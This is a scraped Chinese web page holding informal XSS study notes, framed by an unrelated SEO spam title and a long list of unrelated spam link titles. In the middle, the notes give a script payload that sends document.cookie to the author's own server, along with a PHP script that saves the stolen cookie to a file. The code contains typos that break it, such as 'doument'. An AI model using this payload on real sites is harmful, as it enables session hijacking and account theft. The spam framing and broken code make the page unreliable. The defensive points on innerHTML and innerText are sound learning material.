当前位置: 首页 > news >正文

网站域名注册商哪家网络营销好

网站域名注册商,哪家网络营销好,网站查询服务器,做电影网站要几G空间的(乱写的一些笔记) innerHTML只防script像是img就不会防 innerText都防 上面代码执行避免用户交互 js也可以用’‘执行 例子 alert’1‘ document.location.hash // #号后的部分,包括#号 document.location.host // 域名…

(乱写的一些笔记)

innerHTML只防script像是img就不会防

innerText都防

上面代码执行避免用户交互

 js也可以用’‘执行

例子 alert’1‘

document.location.hash          // #号后的部分,包括#号
document.location.host          // 域名+端口号
document.location.hostname      // 域名
document.location.href          // 完整URL
document.location.pathname      // 目录部分
document.location.port          // 端口号
document.location.protocol      // 网络协议(http:)
document.location.search        // ?号后的部分

document.location.hash.slice(1)//获取#号后的部分,不包括#号

cookie和session关系  session就是cookie,在你注册一个用户,服务器生成一个session文件,session文件名为一个随机字符串,文件里面存储一些你的信息。服务端会将你的文件名返回给你的客户端,保存在你客户端的cookie,当你二次登陆时浏览器会带着你的cookie进入到服务端,服务器就会在自己的文件中找有没有你cookie名字的文件

xss payload 构造<script>doument.location.href=“自己服务器地址/cookie.php?cookie=”+doument.cookie</script>

接收cookie的脚本cookie.php

<?php

$cookie=$_GET['cookie'];

//将coolie变量传入file.txt中

file_put_contents('file.txt',$cookkie)

?>

http://www.yayakq.cn/news/854522/

相关文章:

  • 物流公司 网站模板乐都网站建设公司
  • 门户网站 需求免费相册制作app
  • 网站建设对于电子商务的意义在广州注册公司需要什么资料
  • 京东快递 网站建设特点晋城网站建设网站
  • 呼伦贝尔网站建设公司wordpress版权信息上方图片
  • dedecms win8风格网站模板怎么做简单的网站首页
  • 中山专业门户网站制作平台黄埔区做网站
  • 网站建设公司整站源码合肥集团网站建设公司
  • html5开发网站wordpress房产主题
  • 网站建设的目的包含哪些方面搜索引擎优化的流程
  • 重庆高端网站设计公司互联网网站建设维护
  • 官网的网站建设公司微信app下载安装官方版2022网址
  • 有免费的网站服务器吗网站如何做外链
  • 广州seo网站优化培训海东企业网站建设
  • 网站上的截图怎么做班级网站建设的范围
  • 网站开发需要什么步骤网站建设 赚钱吗
  • 广西做网站公司排名网店运营怎么学
  • 北京给网站做系统的公司名称wordpress地方门户
  • 网站 pinghei网站开发教学大纲
  • 免费自建网站工具网页设计与制作书
  • 天河区门户网站苏州公司网站建设电话
  • 湖南营销型网站建设 在线磐石网络建站快车的使用方法
  • 湖北洪湖市建设局网站网站建设网页模板下载
  • 网站布局怎么设计福田网站-建设深圳信科
  • wordpress信息发布系统关键词的优化方案
  • 外国人做那个的视频网站云霄网站建设
  • 个人网站有自己服务器是不是就不需要虚拟主机菜鸟html在线编辑器
  • 小企业网站建设菌算织梦网站入侵
  • 有什么公司建网站商城开发外包
  • 如何进入公司网站的后台h5技术建设网站